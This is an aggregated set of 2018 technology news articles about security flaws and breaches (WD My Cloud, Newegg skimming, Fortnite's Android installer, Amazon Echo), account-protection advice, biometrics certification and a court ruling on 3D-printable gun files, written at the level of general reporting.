Security

Password bypass flaw in Western Digital My Cloud drives puts data at risk

Posted by | cloud computing, computer security, computing, exploit, firmware, Gadgets, hacking, hardware, Security, software testing, spokesperson, Twitter, vulnerability, Western Digital | No Comments

A security researcher has published details of a vulnerability in a popular cloud storage drive after the company failed to issue security patches for over a year.

Remco Vermeulen found a privilege escalation bug in Western Digital’s My Cloud devices, which he said allows an attacker to bypass the admin password on the drive, gaining “complete control” over the user’s data.

The exploit works because drive’s web-based dashboard doesn’t properly check a user’s credentials before giving a possible attacker access to tools that should require higher levels of access.

The bug was “easy” to exploit, Vermeulen told TechCrunch in an email, and was remotely exploitable if a My Cloud device allows remote access over the internet — which thousands of devices do. He posted a proof-of-concept video on Twitter.

Details of the bug were also independently found by another security team, which released its own exploit code.

Vermeulen reported the bug over a year ago, in April 2017, but said the company stopped responding. Normally, security researchers give 90 days for a company to respond, in line with industry-accepted responsible disclosure guidelines.

After he found that WD updated the My Cloud firmware in the meanwhile without fixing the vulnerability he found, he decided to post his findings.

A year later, WD still hasn’t released a patch.

The company confirmed that it knows of the vulnerability but did not say why it took more than a year to issue a fix. “We are in the process of finalizing a scheduled firmware update that will resolve the reported issue,” a spokesperson said, which will arrive “within a few weeks.”

WD said that several of its My Cloud products are vulnerable — including the EX2, EX4 and Mirror, but not My Cloud Home.

In the meantime, Vermeulen said that there’s no fix and that users have to “just disconnect” the drive altogether if they want to keep their data safe.

Powered by WPeMatico

Hackers stole customer credit cards in Newegg data breach

Posted by | eCommerce, Gadgets, Hack, newegg, Security | No Comments

Newegg is clearing up its website after a month-long data breach.

Hackers injected 15 lines of card skimming code on the online retailer’s payments page which remained for more than a month between August 14 and September 18, Yonathan Klijnsma, a threat researcher at RiskIQ, told TechCrunch. The code siphoned off credit card data from unsuspecting customers to a server controlled by the hackers with a similar domain name — likely to avoid detection. The server even used an HTTPS certificate to blend in.

The code also worked for both desktop and mobile customers — though it’s unclear if mobile customers are affected.

The online electronics retailer removed the code on Tuesday after it was contacted by incident response firm Volexity, which first discovered the card skimming malware and reported its findings.

Newegg is one of the largest retailers in the US, making $2.65 billion in revenue in 2016. The company touts more than 45 million monthly unique visitors, but it’s not known precisely how many customers completed transactions during the period.

In an email to customers, Newegg chief executive Danny Lee said the company has “not yet determined which customer accounts may have been affected.” When reached, a Newegg spokesperson did not immediately comment.

Klijnsma called the incident “another well-disguised attack” that looked near-identical to the recent British Airways credit card breach, and earlier, the Ticketmaster breach. Like that breach, RiskIQ attributed the Newegg credit card theft to the Magecart group, a collective of hackers that carry out targeted attacks against vulnerable websites.

The code used in both skimming attacks was near identical, according to the research.

“The breach of Newegg shows the true extent of Magecart operators’ reach,” said Klijnsma. “These attacks are not confined to certain geolocations or specific industries—any organization that processes payments online is a target.”

Like previous card skimming campaigns, he said that the hackers “integrated with the victim’s payment system and blended with the infrastructure and stayed there as long as possible.”

Anyone who entered their credit card data during the period should immediately contact their banks.

Powered by WPeMatico

Five security settings in iOS 12 you should change right now

Posted by | Apple, Gadgets, iOS 12, lists, Mobile, privacy, Security | No Comments

iOS 12, Apple’s latest mobile software for iPhone and iPad, is finally out. The new software packs in a bunch of new security and privacy features you’ve probably already heard about.

Here’s what you need to do to take advantage of the new settings and lock down your device.

1. Turn on USB Restricted Mode to make hacking more difficult

This difficult-to-find new feature prevents any accessories from connecting to your device — like USB cables and headphones — when your iPhone or iPad has been locked for more than an hour. That prevents police and hackers alike from using tools to bypass your lock screen passcode and get your data.

Go to Settings > Touch ID & Passcode and type in your passcode. Then, scroll down and ensure that USB Accessories are not permitted on the lock screen, so make sure the setting is Off. (On an iPhone X, check your Face ID settings instead.)

2. Make sure automatic iOS updates are turned on

Every time your iPhone or iPad updates, it comes with a slew of security patches to prevent crashes or data theft. Yet, how often do you update your phone? Most don’t bother unless it’s a major update. Now, iOS 12 will update your device behind the scenes, saving you downtime. Just make sure you switch it on.

Go to Settings > General > Software Update and turn on automatic updates.

3. Set a stronger device passcode

iOS has gotten better in recent years with passcodes. For years, it was a four-digit code by default, and now it’s six-digits. That makes it far more difficult to run through every combination — known as brute-forcing.

But did you know that you can set a number-only code of any length? Eight-digits, twelve — even more — and it keeps the number keypad on the lock screen so you don’t have to fiddle around with the keyboard.

Go to Settings > Touch ID & Passcode and enter your passcode. Then, go to Change password and, from the options, set a Custom Numeric Code.

4. Now, switch on two-factor authentication

Two-factor is one of the best ways to keep your account safe. If someone steals your password, they still need your phone to break into your account. For years, two-factor has been cumbersome and annoying. Now, iOS 12 has a new feature that auto-fills the code, so it takes the frustration step out of the equation — so you have no excuse.

You may be asked to switch on two-factor when you set up your phone. You can also go to Settings and tap your name, then go to Password & Security. Just tap Turn on Two-Factor Authentication and follow the prompts.

5. While you’re here… change your reused passwords

iOS 12’s password manager has a new feature: password auditing. If it finds you’ve used the same password on multiple sites, it will warn you and advise you to change those passwords. It prevents password reuse attacks (known as “credential stuffing“) that hackers use to break into multiple sites and services using the same username and password.

Go to Settings > Passwords & Accounts > Website & App Passwords and enter your passcode. You’ll see a small warning symbol next to each account that recognizes a reused password. One tap of the Change Password on Website button and you’re done.

Powered by WPeMatico

Fido Alliance adds a biometrics certification program to help fight spoofing

Posted by | biometrics, consumer electronics, facial recognition, Fido Alliance, Identification, Mobile, Security, TC, voice recognition | No Comments

In a move aimed at upping standards across biometric user verification systems, the industry consortium, Fido Alliance, has launched a certification program for biometrics systems.

“The goal of the Biometric Certification Component Program is to provide a framework for the certification of biometric subsystems that can in turn be integrated into FIDO Certified authenticators,” it writes on its website.

While biometric verification systems such as fingerprint readers have been pretty widely adopted in the mobile space already — with Apple introducing its fingerprint biometric, Touch ID, to the iPhone a full five years ago; followed, last fall, by a facial recognition biometric (Face ID) for its high end iPhone X — the Alliance says that, up to now, there hasn’t been a standardized way to validate the accuracy and reliability of biometric recognition systems in the commercial marketplace. Which is where it’s intending the new certification program to come in.

While few would doubt the robustness of Apple’s biometrics components (and testing regime), the sprawlingly diverse Android marketplace hosts all sorts of OEM players — which inevitably raises the risk of some lesser quality components (and/or processes) slipping in.

And in recent years there have been plenty of examples of poorly implemented biometrics, especially in the mobile space — with hackers easily able to crack into various Android devices that were using facial or iris recognition technology in trivially bypassable ways.

In 2017, for example, Chaos Computer Club members used a print out of an eye combined with a contact lens to fox iris scanners on the Samsung Galaxy S8. And that was one of the most sophisticated biometric hacks. Others have just required a selfie of the person to be held up in front of a ‘face unlock’ system to get an easy open sesame.

Where the not-for-profit Alliance comes in — an industry group whose board includes security exec reps from the likes of Amazon, Google and Microsoft, among others — is it’s on a mission to reduce reliance on passwords for digital security because they inject friction into the online experience.

And biometrics do tend to be convenient, given they are attached to each person. Which is why they have been increasingly finding their way into smartphones and all sorts of other consumer electronics — from wearables to car tech, helped by component costs shrinking as biometrics adoption grows.

But it’s no good trying to speed up ID verification if the alternatives being reached for are badly implemented — and end up actively damaging security.

It certainly doesn’t have to be that way.

Apple’s biometrics are not so easily mocked. And while Touch ID is vulnerable to spoofing, like pretty much any fingerprint reader, its depth-mapping Face ID tech is by far the most sophisticated biometric implementation in the consumer electronics space to date. And hasn’t been meaningfully hacked (well, barring attacks by identical twins/strikingly similar looking family members).

So there’s clearly a world of difference (and, well, cost) between a well architected biometric recognition system which puts security considerations front and center, vs the awful sloppy stuff we’ve seen in recent years — where OEMs were just rushing to compete.

Biometrics has certainly often been treated more as a convenience gimmick for device marketing purposes, rather than viewed as a route to evolve (and even potentially enhance) device security.

The Alliance’s certification program is using accredited independent labs to test that biometric subcomponents meet what it dubs “globally recognized performance standards for biometric recognition performance and Presentation Attack Detection (PAD)” — and thus that they are “fit for commercial use”.

PAD refers to various methods that can be used to try to attack and circumvent biometric systems, such as using silicon or gelatine fingerprints, or deploying harvested facial or video imagery of the device owner.

So it looks like the Alliance’s hope for the program is to ‘upskill’ biometric implementations — or at least weed out the really stupid stuff.

“For customers, such as regulated online service providers, OEMs and enterprises, it provides a standardized way to trust that the biometric systems they are relying upon for fingerprint, iris, face and/or voice recognition can reliably identify users and detect presentation attacks,” it writes.

Speed is another goal too, as it says prior to this certification program due diligence was carried out by enterprise customers (or at least by those “who had the capacity to conduct such reviews”) — which required biometric vendors to repeatedly prove performance for each customer.

Whereas going forward vendors can use the program to test and certify just once to validate their system’s performance and re-use that third-party validation across the market — gaining what the Alliance bills as” substantial time and cost savings”.

Commenting in a statement, Brett McDowell, executive director of the Alliance, said: “While border control and law enforcement markets have mature assessment programs for their biometric systems, we were surprised that no such program existed for this rapidly growing consumer market.”

“With biometrics being a popular option for mobile and web applications implementing Fido Authentication, there is a growing need for those service providers to appropriately assess the risk of fraud from lost or stolen devices,” he added.

Asked whether the program had been introduced in response to particular concerns about weak consumer biometrics — given some of the aforementioned examples of poor implementations — McDowell also told us: “With the rise of any new technology, there’s a risk that some suppliers may over emphasize visible features at the expense of security considerations as they rush to market.

“This program, motivated by our online services community, mitigates that risk for mobile and desktop biometrics by providing a commercial-grade benchmark and independent lab assessment for performance features and spoof attack detection security considerations. Another benefit of the program is a clear way for service providers to prove compliance with strong authentication regulation, which is becoming the norm for financial services. This trend is expected to expand to other sectors as passwords continue to be exploited at increasingly alarming rates.”

Currently only one lab has been accredited to perform components testing for the program.

The lab, iBeta, is located in the U.S. but a spokeswoman for the Fido Alliance told us: “The Alliance is actively working to bring in additional labs.”

She added that the Alliance will update this list as more are added.

This post was updated with additional comment from McDowell 

Powered by WPeMatico

Fortnite’s Android installer shipped with an Epic security flaw

Posted by | Android, Apps, epic games, fortnite, Gaming, Google, Mobile, Security | No Comments

Google has clapped back in tremendous fashion at Epic Games, which earlier this month decided to make the phenomenally popular Fortnite available for Android via its own website instead of Google’s Play Store. Unfortunately, the installer had a phenomenally dangerous security flaw in it that would allow a malicious actor to essentially install any software they wanted. Google wasted exactly zero time pointing out this egregious mistake.

By way of a short explanation why this was even happening, Epic explained when it announced its plan that it would be good to have “competition among software sources on Android,” and that the best would “succeed based on merit.” Everyone of course understood that what he meant was that Epic didn’t want to share the revenue from its cash cow with Google, which takes 30 percent of in-app purchases.

Many warned that this was a security risk for several reasons, for example that users would have to enable app installations from unknown sources — something most users have no reason to do. And the Play Store has other protections and features, visible and otherwise, that are useful for users.

Google, understandably, was not amused with Epic’s play, which no doubt played a part in the decision to scrutinize the download and installation process — though I’m sure the safety of its users was also a motivating factor. And wouldn’t you know it, they found a whopper right off the bat.

In a thread posted a week after the Fortnite downloader went live, a Google engineer by the name of Edward explained that the installer basically would allow an attacker to install anything they want using it.

The Fortnite installer basically downloads an APK (the package for Android apps), stores it locally, then launches it. But because it was stored on shared external storage, a bad guy could swap in a new file for it to launch, in what’s called a “man in the disk” attack.

And because the installer only checked that the name of the APK is right, as long as the attacker’s file is called “com.epicgames.fortnite,” it would be installed! Silently, and with lots of extra permissions too, if they want, because of how the unknown sources installation policies work. Not good!

Edward pointed out this could be fixed easily and in a magnificently low-key bit of shade-throwing helpfully linked to a page on the Android developer site outlining the basic feature Epic should have used.

To Epic’s credit, its engineers jumped on the problem immediately and had a fix in the works by that very afternoon and deployed by the next one. Epic InfoSec then requested Google to wait 90 days before publishing the information.

As you can see, Google was not feeling generous. One week later (that’s today) and the flaw has been published on the Google Issue Tracker site in all its… well, not glory exactly. Really, the opposite of glory. This seems to have been Google’s way of warning any would-be Play Store mutineers that they would not be given gentle handling.

Epic Games CEO Tim Sweeney was likewise unamused. In a comment provided to Android Central — which, by the way, predicted that this exact thing would happen — he took the company to task for its “irresponsible” decision to “endanger users.”

Epic genuinely appreciated Google’s effort to perform an in-depth security audit of Fortnite immediately following our release on Android, and share the results with Epic so we could speedily issue an update to fix the flaw they discovered.

However, it was irresponsible of Google to publicly disclose the technical details of the flaw so quickly, while many installations had not yet been updated and were still vulnerable.

An Epic security engineer, at my urging, requested Google delay public disclosure for the typical 90 days to allow time for the update to be more widely installed. Google refused. You can read it all at https://issuetracker.google.com/issues/112630336

Google’s security analysis efforts are appreciated and benefit the Android platform, however a company as powerful as Google should practice more responsible disclosure timing than this, and not endanger users in the course of its counter-PR efforts against Epic’s distribution of Fortnite outside of Google Play.

Indeed, companies really should try not to endanger their users for selfish reasons.

Powered by WPeMatico

Epic Games just gave a perk for folks to turn on 2FA; every other big company should, too

Posted by | Alphabet, Apple, epic games, Gaming, Microsoft, multi-factor authentication, Security, SMS, TC | No Comments

Let’s talk a bit about security.

Most internet users around the world are pretty crap at it, but there are basic tools that companies have, and users can enable, to make their accounts, and lives, a little bit more hacker-proof.

One of these — two-factor authentication — just got a big boost from Epic Games, the maker of what is currently The Most Popular Game In The World: Fortnite.

Epic is already getting a ton of great press for what amounts to very little effort.

Son: Do you know what two-factor authentication is?
Me: Uh, yeah?
Son: I get a free dance on @Fortnitegame if I enable two factor. Can we do that?

Incentives matter.

— Dennis (@DennisF) August 23, 2018

The company is giving users a new emote (the victory dance you’ve seen emulated in airports, playgrounds and parks by kids and tweens around the world) to anyone who turns on two-factor authentication. It’s one small (dance) step for Epic, but one giant leap for securing their users’ accounts.

The thing is any big company could do this (looking at you Microsoft, Apple, Alphabet and any other company with a huge user base).

Apparently the perk of not getting hacked isn’t enough for most users, but if you give anyone the equivalent of a free dance, they’ll likely flock to turn on the feature.

It’s not that two-factor authentication is a panacea for all security woes, but it does make life harder for hackers. Two-factor authentication works on codes, basically tokens, that are either sent via text or through an over-the-air authenticator (OTA). Text messaging is a pretty crap way to secure things, because the codes can be intercepted, but OTAs — like Google Authenticator or Authy — are sent via https (pretty much bulletproof, but requiring an app to use).

So using SMS-based two-factor authentication is better than nothing, but it’s not Fort Knox (however, these days, even Fort Knox probably isn’t Fort Knox when it comes to security).

Still, anything that makes things harder for crimes of opportunity can help ease the security burden for companies large and small, and the consumers and customers that love them (or at least are forced to pay and use them).

I’m not sure what form the perk could or should take. Maybe it’s the promise of a free e-book or a free download or an opportunity to have a live chat with the celebrity, influencer or athlete of a user’s choice. Whatever it is, there’re clearly something that businesses could do to encourage greater adoption.

Self-preservation isn’t cutting it. Maybe an emote will do the trick.

Powered by WPeMatico

Security researchers found a way to hack into the Amazon Echo

Posted by | Alexa, Amazon, Amazon Echo, Gadgets, privacy, Security, TC | No Comments

Hackers at DefCon have exposed new security concerns around smart speakers. Tencent’s Wu HuiYu and Qian Wenxiang spoke at the security conference with a presentation called Breaking Smart Speakers: We are Listening to You, explaining how they hacked into an Amazon Echo speaker and turned it into a spy bug.

The hack involved a modified Amazon Echo, which had parts swapped out, including some that had been soldered on. The modified Echo was then used to hack into other, non-modified Echos by connecting both the hackers’ Echo and a regular Echo to the same LAN.

This allowed the hackers to turn their own, modified Echo into a listening bug, relaying audio from the other Echo speakers without those speakers indicating that they were transmitting.

This method was very difficult to execute, but represents an early step in exploiting Amazon’s increasingly popular smart speaker.

The researchers notified Amazon of the exploit before the presentation, and Amazon has already pushed a patch, according to Wired.

Still, the presentation demonstrates how one Echo, with malicious firmware, could potentially alter a group of speakers when connected to the same network, posing concerns with the idea of Echos in hotels.

Wired explained how the networking feature of the Echo allowed for the hack:

If they can then get that doctored Echo onto the same Wi-Fi network as a target device, the hackers can take advantage of a software component of Amazon’s speakers, known as Whole Home Audio Daemon, that the devices use to communicate with other Echoes in the same network. That daemon contained a vulnerability that the hackers found they could exploit via their hacked Echo to gain full control over the target speaker, including the ability to make the Echo play any sound they chose, or more worryingly, silently record and transmit audio to a faraway spy.

An Amazon spokesperson told Wired that “customers do not need to take any action as their devices have been automatically updated with security fixes,” adding that “this issue would have required a malicious actor to have physical access to a device and the ability to modify the device hardware.”

To be clear, the actor would only need physical access to their own Echo to execute the hack.

While Amazon has dismissed concerns that its voice activated devices are monitoring you, hackers at this year’s DefCon proved that they can.

Powered by WPeMatico

Dixons Carphone says millions more customers affected by 2017 breach

Posted by | Carphone Warehouse, computer security, data breach, Dixons Carphone, electronics, Europe, european union, Gadgets, Mobile, Security, United Kingdom | No Comments

A Dixons Carphone data breach that was disclosed earlier this summer was worse than initially reported. The company is now saying that personal data of 10 million customers could also have been accessed when its systems were hacked.

The European electronics and telecoms retailer believes its systems were accessed by unknown and unauthorized person/s in 2017, although it only disclosed the breach in June, after discovering it during a review of its security systems.

Last month it said 5.9M payment cards and 1.2M customer records had been accessed. But with its investigation into the breach “nearing completion”, it now says approximately 10M records containing personal data (but no financial information) may have been accessed last year — in addition to the 5.9M compromised payment cards it disclosed last month.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated,” the company said in a statement.

In terms of what personal data the 10M records contained, a Dixons Carphone spokeswoman told us: “This continues to relate to personal data, and the types of data that may have been accessed are, for example, name, address or email address.”

The company says it’s taking the precaution of contacting all its customers — to apologize and advise them of “protective steps to minimize the risk of fraud”.

It adds it has no evidence that the unauthorized access is continuing, having taken steps to secure its systems when the breach was discovered last month, saying: “We continue to make improvements and investments at pace to our security environment through enhanced controls, monitoring and testing.”

Commenting in a statement, Dixons Carphone CEO, Alex Baldock, added: “Since our data security review uncovered last year’s breach, we’ve been working around the clock to put it right. That’s included closing off the unauthorised access, adding new security measures and launching an immediate investigation, which has allowed us to build a fuller understanding of the incident that we’re updating on today.

“Again, we’re disappointed in having fallen short here, and very sorry for any distress we’ve caused our customers. I want to assure them that we remain fully committed to making their personal data safe with us.”

Back in 2015, Carphone Warehouse, a mobile division of Dixons Carphone, also suffered a hack which affected around 3M people. And in January the company was fined £400k by the ICO as a consequence of that earlier breach.

Since then new European Union regulations (GDPR) have come into force which greatly raise the maximum penalties which regulators can impose for serious data breaches.

Last month, following Dixon’s disclosure of the latest breach, the UK’s data watchdog, the ICO, told us it was liaising with the National Cyber Security Centre, the Financial Conduct Authority and other relevant agencies to ascertain the details and impact on customers.

Of the 5.9M payment cards which Dixons disclosed last month as having been compromised, it said the vast majority had been protected by chip and PIN technology. But around 105,000 lacked the security tech so Dixons said at the time could therefore have been compromised.

It’s the additional 1.2M records containing non-financial personal data — such as name, address or email address — that have been revised upwards now, to ~10M records, which constitutes almost half the Group’s customer base in the UK and Ireland.

The spokeswoman told us the Group has approximately 22M customers in the region.

https://www.ncsc.gov.uk/guidance/ncsc-advice-dixons-carphone-plc-customers

Powered by WPeMatico

Instagram is building non-SMS 2-factor auth to thwart SIM hackers

Posted by | Apps, instagram, Mobile, Security, Social, two factor authentication | No Comments

Hackers can steal your phone number by reassigning it to a different SIM card, use it to reset your passwords, steal your Instagram and other accounts and sell them for bitcoin. As detailed in a harrowing Motherboard article today, Instagram accounts are especially vulnerable because the app only offers two-factor authentication through SMS that delivers a password reset or login code via text message.

But now Instagram has confirmed to TechCrunch that it’s building a non-SMS two-factor authentication system that works with security apps like Google Authenticator or Duo. They generate a special code that you need to log in that can’t be generated on a different phone in case your number is ported to a hacker’s SIM card.

Buried in the Instagram Android app’s APK code is a prototype of the upgraded 2FA feature, discovered by frequent TechCrunch tipster Jane Manchun Wong. Her work has led to confirmed TechCrunch scoops on Instagram Video Calling, Usage Insights, soundtracks for Stories and more.

When presented with the screenshots, an Instagram spokesperson told TechCrunch that yes, it is working on the non-SMS 2FA feature, saying, “We’re continuing to improve the security of Instagram accounts, including strengthening 2-factor authentication.”

Instagram actually lacked any two-factor protection until 2016 when it already had 400 million users. In November 2015, I wrote a story titled “Seriously. Instagram Needs Two-Factor Authentication.” A friend and star Instagram stop-motion animation creator Rachel Ryle had been hacked, costing a lucrative sponsorship deal. The company listened. Three months later, the app began rolling out basic SMS-based 2FA.

But since then, SIM porting has become a much more common problem. Hackers typically call a mobile carrier and use social engineering tactics to convince them they’re you, or bribe an employee to help, and then change your number to a SIM card they control. Whether they’re hoping to steal intimate photos, empty cryptocurrency wallets or sell desirable social media handles like @t or @Rainbow as Motherboard reported, there are plenty of incentives to try a SIM porting attack. This article outlines how you can take steps to protect your phone number.

Hopefully as knowledge of this hacking technique becomes more well-known, more apps will introduce non-SMS 2FA, mobile providers will make it tougher to port numbers and users will take more steps to safeguard their accounts. As our identities and assets increasingly go digital, it’s pin codes and authenticator apps, not just deadbolts and home security systems, that must become a part of our everyday lives.

Powered by WPeMatico

Court victory legalizes 3D-printable gun blueprints

Posted by | 3d printing, defense distributed, Gadgets, Government, guns, lawsuit, Security | No Comments

A multi-year legal battle over the ability to distribute computer models of gun parts and replicate them in 3D printers has ended in defeat for government authorities who sought to prevent the practice. Cody Wilson, the gunmaker and free speech advocate behind the lawsuit, now intends to expand his operations, providing printable gun blueprints to all who desire them.

The longer story of the lawsuit is well told by Andy Greenberg over at Wired, but the decision is eloquent on its own. The fundamental question is whether making 3D models of gun components available online is covered by the free speech rights granted by the First Amendment.

This is a timely but complex conflict because it touches on two themes that happen to be, for many, ethically contradictory. Arguments for tighter restrictions on firearms are, in this case, directly opposed to arguments for the unfettered exchange of information on the internet. It’s hard to advocate for both here: restricting firearms and restricting free speech are one and the same.

That at least seems to be conclusion of the government lawyers, who settled Wilson’s lawsuit after years of court battles. In a copy of the settlement provided to me by Wilson, the U.S. government agrees to exempt “the technical data that is the subject of the Action” from legal restriction. The modified rules should appear in the Federal Register soon.

What does this mean? It means that a 3D model that can be used to print the components of a working firearm is legal to own and legal to distribute. You can likely even print it and use the product — you just can’t sell it. There are technicalities to the law here (certain parts are restricted, but can be sold in an incomplete state, etc.), but the implications as regards the files themselves seems clear.

Wilson’s original vision, which he is now pursuing free of legal obstacles, is a repository of gun models, called DEFCAD, much like any other collection of data on the web, though naturally considerably more dangerous and controversial.

“I currently have no national legal barriers to continue or expand DEFCAD,” he wrote in an email to TechCrunch. “This legal victory is the formal beginning to the era of downloadable guns. Guns are as downloadable as music. There will be streaming services for semi-automatics.”

The concepts don’t map perfectly, no doubt, but it’s hard to deny that with the success of this lawsuit, there are few legal restrictions to speak of on the digital distribution of firearms. Before it even, there were few technical restrictions: certainly just as you could download MP3s on Napster in 2002, you can download a gun file today.

Gun control advocates will no doubt argue that greater availability of lethal weaponry is the opposite of what is needed in this country. But others will point out that in a way this is a powerful example of how liberally free speech can be defined. It’s important to note that both of these things can be true.

This court victory settles one case, but marks the beginnings of many another. “I have promoted my values for years with great care and diligence,” Wilson wrote. It’s hard to disagree with that. Those whose values differ are free to pursue them in their own way; perhaps they too will be awarded victories of this scale.

Powered by WPeMatico